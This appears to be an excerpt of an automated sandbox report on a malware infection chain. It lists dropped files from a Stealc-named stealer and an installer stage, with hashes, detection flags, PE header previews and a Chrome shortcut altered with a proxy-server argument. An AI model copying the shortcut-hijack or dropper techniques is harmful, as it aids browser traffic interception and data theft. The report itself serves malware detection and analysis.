                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):608080
                                                                          Entropy (8bit):6.833616094889818
                                                                          Encrypted:false
                                                                          SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                          MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                          SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                          SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                          SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Joe Sandbox View:
                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):450024
                                                                          Entropy (8bit):6.673992339875127
                                                                          Encrypted:false
                                                                          SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                          MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                          SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                          SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                          SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):2046288
                                                                          Entropy (8bit):6.787733948558952
                                                                          Encrypted:false
                                                                          SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                          MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                          SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                          SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                          SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):257872
                                                                          Entropy (8bit):6.727482641240852
                                                                          Encrypted:false
                                                                          SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                          MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                          SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                          SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                          SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):80880
                                                                          Entropy (8bit):6.920480786566406
                                                                          Encrypted:false
                                                                          SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                          MD5:A37EE36B536409056A86F50E67777DD7
                                                                          SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                          SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                          SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:41 2023, mtime=Wed Oct 4 13:16:56 2023, atime=Wed Sep 27 04:28:27 2023, length=3242272, window=hide
                                                                          Category:dropped
                                                                          Size (bytes):2104
                                                                          Entropy (8bit):3.4514660614862924
                                                                          Encrypted:false
                                                                          SSDEEP:48:8S6l2dfTXd3RYrnvPdAKRkdAGdAKRFdAKRE:8S6lOw
                                                                          MD5:F44904B171B0EB73D6AEB97EE1C497CD
                                                                          SHA1:C47DF076D0C9031A7A43CC1FBF9DFF2886C84EB1
                                                                          SHA-256:EFE67B38166A3A108B130BECD343955B17CD7D09696F2968A7B38F0279AD0BA7
                                                                          SHA-512:A96BE4EC462DF842F6A168DE8C108641AB44D169CF17B00001D70A0DE1D985598B5E7DE0A9D5B0E5BC08408034BE58E606F159149338CE543F684E1F6963C106
                                                                          Malicious:false
                                                                          Preview:L..................F.@.. ......,....[c^n.......q.... y1.....................#....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IDW.r....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VDWUl....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VDWUl....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VDWUl..........................."&.A.p.p.l.i.c.a.t.i.o.n.....`.2. y1.;W.+ .chrome.exe..F......CW.VDW.r..........................,.6.c.h.r.o.m.e...e.x.e.......d...............-.......c............F.......C:\Program Files\Google\Chrome\Application\chrome.exe....A.c.c.e.s.s. .t.h.e. .I.n.t.e.r.n.e.t.;.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.!.-.-.p.r.o.x.y.-.s.e.r.v.e.r
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp
                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):334848
                                                                          Entropy (8bit):6.5257884005400015
                                                                          Encrypted:false
                                                                          SSDEEP:6144:JmuFcP82IqE5RSbvQpYVgMW2i32blpDW2pmoZ1:JmuFc02IqE7SbLVgR1O
                                                                          MD5:C1D465E061D7D02895DAEB19BDB28AC9
                                                                          SHA1:5E729EE51DF080545C7031D771B85094A2B2D4E9
                                                                          SHA-256:777917D30F277A9E88D8FC04E69B955A2B0BD3F2BCF2E36F7F9CFFEF2583EE60
                                                                          SHA-512:438ADAA0AC3AD47621D288E3FF56493CC7DE4E2A89FC5420E246A6045DB79E7CB84A28D3F3420841340AB33BD632F12FDC3A4E9D8EF99601CA9F975B7F8309E1
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#................ ..............a.................................g........ ......................P..Z........j...p..8.......................d............................`......................@................................text...............................`.P`.data...............................@.0..rdata...s.......t..................@.p@.eh_framD....p.......<..............@.0@.bss....H....@........................p..edata..Z....P......................@.0@.idata...j.......l..................@.0..CRT....,....P......................@.0..tls.... ....`......................@.0..rsrc...8....p......................@.0..reloc..d........ ..................@.0B........................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Category:modified
                                                                          Size (bytes):3117056
                                                                          Entropy (8bit):6.560473138005523
                                                                          Encrypted:false
                                                                          SSDEEP:49152:KYtaxqFC/PPqRsnxZniLwd2tnkbSJVKcD+YP://FWPqRsn7niLxk0Kc9P
                                                                          MD5:B19555358F3C9ABC6157B2B7AAB2F658
                                                                          SHA1:177FDA0D1D0444E6CF1CA8A915F5F2212BD092E1
                                                                          SHA-256:2B0062E5EF0C0BBC9034BA09296F47B26DD0528DD8131DCCFD10009A516B1104
                                                                          SHA-512:6BFF37EB0C5617FAB6512C9A31E701F04ABFE1B5EB1FA70B93C83DE9A118E434ECB1F49C6E7BAF5335AE32D8B04B296835F028CA8EEE7858C11A4797E07D64B0
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...VK.L.................."..........{"......."...@.........................../.....A]0.......................................".......#..>............................................................................"..............................text...J.".......".................`....rdata...1...."..@....".............@..@.data...XT... #..0... #.............@....rsrc....@....#..@...P#.............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp
                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):334848
                                                                          Entropy (8bit):6.5257884005400015
                                                                          Encrypted:false
                                                                          SSDEEP:6144:JmuFcP82IqE5RSbvQpYVgMW2i32blpDW2pmoZ1:JmuFc02IqE7SbLVgR1O
                                                                          MD5:C1D465E061D7D02895DAEB19BDB28AC9
                                                                          SHA1:5E729EE51DF080545C7031D771B85094A2B2D4E9
                                                                          SHA-256:777917D30F277A9E88D8FC04E69B955A2B0BD3F2BCF2E36F7F9CFFEF2583EE60
                                                                          SHA-512:438ADAA0AC3AD47621D288E3FF56493CC7DE4E2A89FC5420E246A6045DB79E7CB84A28D3F3420841340AB33BD632F12FDC3A4E9D8EF99601CA9F975B7F8309E1
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#................ ..............a.................................g........ ......................P..Z........j...p..8.......................d............................`......................@................................text...............................`.P`.data...............................@.0..rdata...s.......t..................@.p@.eh_framD....p.......<..............@.0@.bss....H....@........................p..edata..Z....P......................@.0@.idata...j.......l..................@.0..CRT....,....P......................@.0..tls.... ....`......................@.0..rsrc...8....p......................@.0..reloc..d........ ..................@.0B........................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):3117056
                                                                          Entropy (8bit):6.560473070621625
                                                                          Encrypted:false
                                                                          SSDEEP:49152:jYtaxqFC/PPqRsnxZniLwd2tnkbSJVKcD+YP:K/FWPqRsn7niLxk0Kc9P
                                                                          MD5:B9C06313513E81356218D8C9EA750418
                                                                          SHA1:1B1CD53A133A08EF80992537A244D333A22A4BF5
                                                                          SHA-256:FF55920072D363E0F0B38B32E9C925C314DD7358F8C3ECA4B3A04FDD8B99AFE0
                                                                          SHA-512:B3BAFBF227ABF2196A9B2E21A8AD410D4899AC8D6A63C97EB1DFA1D68FAC7F7107960C3A619CAF1CC669E248290B4E1D309002DE0B426A354D0902561034B3A2
                                                                          Malicious:false
                                                                          Preview:.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...VK.L.................."..........{"......."...@.........................../.....A]0.......................................".......#..>............................................................................"..............................text...J.".......".................`....rdata...1...."..@....".............@..@.data...XT... #..0... #.............@....rsrc....@....#..@...P#.............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp
                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):348160
                                                                          Entropy (8bit):6.542655141037356
                                                                          Encrypted:false
                                                                          SSDEEP:6144:OcV9z83OtqxnEYmt3NEnvfF+Tbmbw6An8FMciFMNrb3YgxxpbCAOxO2ElvlE:Ooz83OtIEzW+/m/AyF7bCrO/E
                                                                          MD5:86F1895AE8C5E8B17D99ECE768A70732
                                                                          SHA1:D5502A1D00787D68F548DDEEBBDE1ECA5E2B38CA
                                                                          SHA-256:8094AF5EE310714CAEBCCAEEE7769FFB08048503BA478B879EDFEF5F1A24FEFE
                                                                          SHA-512:3B7CE2B67056B6E005472B73447D2226677A8CADAE70428873F7EFA5ED11A3B3DBF6B1A42C5B05B1F2B1D8E06FF50DFC6532F043AF8452ED87687EEFBF1791DA
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2..S..S..S..Tp..S..S..5S..BX..S..BX...S..BX..Q..BX..S..BX..S..BX..S..Rich.S..........................PE..L.....V>...........!................."............4|.........................`......................................t....C......(.... .......................0..d+..H...8...........................x...H...............l............................text............................... ..`.rdata..@...........................@..@.data... h.......`..................@....rsrc........ ......................@..@.reloc..d+...0...0... ..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):392048
                                                                          Entropy (8bit):6.542831007177094
                                                                          Encrypted:false
                                                                          SSDEEP:6144:1eIwnft+S34NVSTjMFR+oVbKQfbno1/1oz6i2EDSD4I+XdtQXGMiFcoOjAWcIhbl:1eIwnft+S34NVSTQD+oVbKQfrC/1ct25
                                                                          MD5:EE856A00410ECED8CC609936D01F954E
                                                                          SHA1:705D378626AEC86FECFDF04C86244006BC3AF431
                                                                          SHA-256:B6192300D3C1476EF3C25A368D055AA401035E78F9F6DBE5F93C84D36EF1FA62
                                                                          SHA-512:666D731247DAEAE4B57925DFA8CAE845327FD34E0F6B9AAD1BCF471D1800D7E8AF5642A5FB6E0EC58BA3AC7DD98A6D3FE0B473F34C16FFB9985621C98C0463EF
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../.v[N.%[N.%[N.%4*.$QN.%4*.$.N.%4*.$IN.%4*.$YN.%.*.$HN.%.*.$GN.%.*.$KN.%.*.$XN.%[N.%.O.%.*.$iN.%.*.$ZN.%.*e%ZN.%.*.$ZN.%Rich[N.%........PE..L...D.r^...........!.....8..........^7.......P......................................'.....@..........................6..<)..L_..<.......X...............p3.......3..@,..............................`,..@............P...............................text....7.......8.................. ..`.rdata..l....P.......<..............@..@.data....?...p...6...X..............@....rsrc...X...........................@..@.reloc...3.......4..................@..B................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp
                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):719720
                                                                          Entropy (8bit):6.620042925263483
                                                                          Encrypted:false
                                                                          SSDEEP:12288:ST+z0ucMr64M+yiwUqfWY/EThHzgOXfpwN9Cu66vLHL1e13XYFU8HtUDsMBPxtFe:FPAeKLL1e6kpqsookesEiU1xJycD4R1z
                                                                          MD5:20B6B06BBD211A8ACFE51193653E4167
                                                                          SHA1:817D442B46DD6F35FD9641E0C7262C934ED76848
                                                                          SHA-256:7A16E6ED0C0A49AEB8EA4972600A7A1422C92550602A150634B1C221F79300B4
                                                                          SHA-512:0F0C31D46E7274F28F62AFBBB4A172CB088AF40F6C71A56297B08D83D16548C0A4FDA4CF5F4A29C1445EEDF15FE81FC405E2EB8680F92C744406D031A05A72C8
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+X?|o9Q/o9Q/o9Q/{RR.e9Q/{RT..9Q/{RU.}9Q/{RP.m9Q/=QT.r9Q/=QU.`9Q/=QR.z9Q/.PP.l9Q/o9P/j;Q/.PU.C9Q/.PQ.n9Q/.P./n9Q/.PS.n9Q/Richo9Q/................PE..L...3..c...........!.....d...~......Z........................................ .......9....@.............................4@...)..<.......................h).......S..@...T...............................@............................................text...Lb.......d.................. ..`.rdata...............h..............@..@.data...`I...`...6...D..............@....rsrc................z..............@..@.reloc...S.......T...~..............@..B........................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):1471856
                                                                          Entropy (8bit):6.8308189184145665
                                                                          Encrypted:false
                                                                          SSDEEP:24576:6PQ+KpPa3kPjWWJy+0PX7PM6ZB9In8QmMMWwI6/I+no9R2aFVWKZxPo89/xc3lRc:brWW0jnMVpUBuwemQnGP8RqYr1mpbk3
                                                                          MD5:A236287C42F921D109475D47E9DCAC2B
                                                                          SHA1:6D7C177A0AC3076383669BCE46608EB4B6B787EC
                                                                          SHA-256:63AA600A7C914C2D59280069169CC93E750E42C9A1146E238C9128E073D578FD
                                                                          SHA-512:C325B12235AD77937E3799F1406EB6AA3BC5479BFDFF0EA2F2178FE243E63689AC37BB539ADCBB326B0DE6C09B884771AD57F59184A5B69065682855382ADD8A
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ...A.W.A.W.A.W.%.V.A.W.%.VeA.W.%.V.A.W.%.V.A.W.%.V.A.W.%.V.A.W.%.V.A.W.A.WUA.W.A.W.A.W2%.V.C.W2%.V.A.W2%.W.A.W2%.V.A.WRich.A.W................PE..L.....r^...........!.....v...............................................................@..........................r......H*..x.......X............B..p3..........@e..............................`e..@............................................text....u.......v.................. ..`.rdata..............z..............@..@.data........@...j... ..............@....rsrc...X...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp
                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):499712
                                                                          Entropy (8bit):6.414789978441117
                                                                          Encrypted:false
                                                                          SSDEEP:12288:fJzxYPVsBnxO/R7krZhUgiW6QR7t5k3Ooc8iHkC2eq:fZxvBnxOJ7ki3Ooc8iHkC2e
                                                                          MD5:561FA2ABB31DFA8FAB762145F81667C2
                                                                          SHA1:C8CCB04EEDAC821A13FAE314A2435192860C72B8
                                                                          SHA-256:DF96156F6A548FD6FE5672918DE5AE4509D3C810A57BFFD2A91DE45A3ED5B23B
                                                                          SHA-512:7D960AA8E3CCE22D63A6723D7F00C195DE7DE83B877ECA126E339E2D8CC9859E813E05C5C0A5671A75BB717243E9295FD13E5E17D8C6660EB59F5BAEE63A7C43
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............................................................................Rich...................PE..L.....w>...........!.................-............:|................................~e..............................$...?...d!..<....`.......................p...0..8...8...............................H............................................text............................... ..`.rdata..2*.......0..................@..@.data...h!...0... ...0..............@....rsrc........`.......P..............@..@.reloc...0...p...@...`..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):1471856
                                                                          Entropy (8bit):6.8308189184145665
                                                                          Encrypted:false
                                                                          SSDEEP:24576:6PQ+KpPa3kPjWWJy+0PX7PM6ZB9In8QmMMWwI6/I+no9R2aFVWKZxPo89/xc3lRc:brWW0jnMVpUBuwemQnGP8RqYr1mpbk3
                                                                          MD5:A236287C42F921D109475D47E9DCAC2B
                                                                          SHA1:6D7C177A0AC3076383669BCE46608EB4B6B787EC
                                                                          SHA-256:63AA600A7C914C2D59280069169CC93E750E42C9A1146E238C9128E073D578FD
                                                                          SHA-512:C325B12235AD77937E3799F1406EB6AA3BC5479BFDFF0EA2F2178FE243E63689AC37BB539ADCBB326B0DE6C09B884771AD57F59184A5B69065682855382ADD8A
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ...A.W.A.W.A.W.%.V.A.W.%.VeA.W.%.V.A.W.%.V.A.W.%.V.A.W.%.V.A.W.%.V.A.W.A.WUA.W.A.W.A.W2%.V.C.W2%.V.A.W2%.W.A.W2%.V.A.WRich.A.W................PE..L.....r^...........!.....v...............................................................@..........................r......H*..x.......X............B..p3..........@e..............................`e..@............................................text....u.......v.................. ..`.rdata..............z..............@..@.data........@...j... ..............@....rsrc...X...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp
                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):719720
                                                                          Entropy (8bit):6.620042925263483
                                                                          Encrypted:false
                                                                          SSDEEP:12288:ST+z0ucMr64M+yiwUqfWY/EThHzgOXfpwN9Cu66vLHL1e13XYFU8HtUDsMBPxtFe:FPAeKLL1e6kpqsookesEiU1xJycD4R1z
                                                                          MD5:20B6B06BBD211A8ACFE51193653E4167
                                                                          SHA1:817D442B46DD6F35FD9641E0C7262C934ED76848
                                                                          SHA-256:7A16E6ED0C0A49AEB8EA4972600A7A1422C92550602A150634B1C221F79300B4
                                                                          SHA-512:0F0C31D46E7274F28F62AFBBB4A172CB088AF40F6C71A56297B08D83D16548C0A4FDA4CF5F4A29C1445EEDF15FE81FC405E2EB8680F92C744406D031A05A72C8
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+X?|o9Q/o9Q/o9Q/{RR.e9Q/{RT..9Q/{RU.}9Q/{RP.m9Q/=QT.r9Q/=QU.`9Q/=QR.z9Q/.PP.l9Q/o9P/j;Q/.PU.C9Q/.PQ.n9Q/.P./n9Q/.PS.n9Q/Richo9Q/................PE..L...3..c...........!.....d...~......Z........................................ .......9....@.............................4@...)..<.......................h).......S..@...T...............................@............................................text...Lb.......d.................. ..`.rdata...............h..............@..@.data...`I...`...6...D..............@....rsrc................z..............@..@.reloc...S.......T...~..............@..B........................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp
                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):499712
                                                                          Entropy (8bit):6.414789978441117
                                                                          Encrypted:false
                                                                          SSDEEP:12288:fJzxYPVsBnxO/R7krZhUgiW6QR7t5k3Ooc8iHkC2eq:fZxvBnxOJ7ki3Ooc8iHkC2e
                                                                          MD5:561FA2ABB31DFA8FAB762145F81667C2
                                                                          SHA1:C8CCB04EEDAC821A13FAE314A2435192860C72B8
                                                                          SHA-256:DF96156F6A548FD6FE5672918DE5AE4509D3C810A57BFFD2A91DE45A3ED5B23B
                                                                          SHA-512:7D960AA8E3CCE22D63A6723D7F00C195DE7DE83B877ECA126E339E2D8CC9859E813E05C5C0A5671A75BB717243E9295FD13E5E17D8C6660EB59F5BAEE63A7C43
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............................................................................Rich...................PE..L.....w>...........!.................-............:|................................~e..............................$...?...d!..<....`.......................p...0..8...8...............................H............................................text............................... ..`.rdata..2*.......0..................@..@.data...h!...0... ...0..............@....rsrc........`.......P..............@..@.reloc...0...p...@...`..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp
                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):348160
                                                                          Entropy (8bit):6.542655141037356
                                                                          Encrypted:false
                                                                          SSDEEP:6144:OcV9z83OtqxnEYmt3NEnvfF+Tbmbw6An8FMciFMNrb3YgxxpbCAOxO2ElvlE:Ooz83OtIEzW+/m/AyF7bCrO/E
                                                                          MD5:86F1895AE8C5E8B17D99ECE768A70732
                                                                          SHA1:D5502A1D00787D68F548DDEEBBDE1ECA5E2B38CA
                                                                          SHA-256:8094AF5EE310714CAEBCCAEEE7769FFB08048503BA478B879EDFEF5F1A24FEFE
                                                                          SHA-512:3B7CE2B67056B6E005472B73447D2226677A8CADAE70428873F7EFA5ED11A3B3DBF6B1A42C5B05B1F2B1D8E06FF50DFC6532F043AF8452ED87687EEFBF1791DA
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
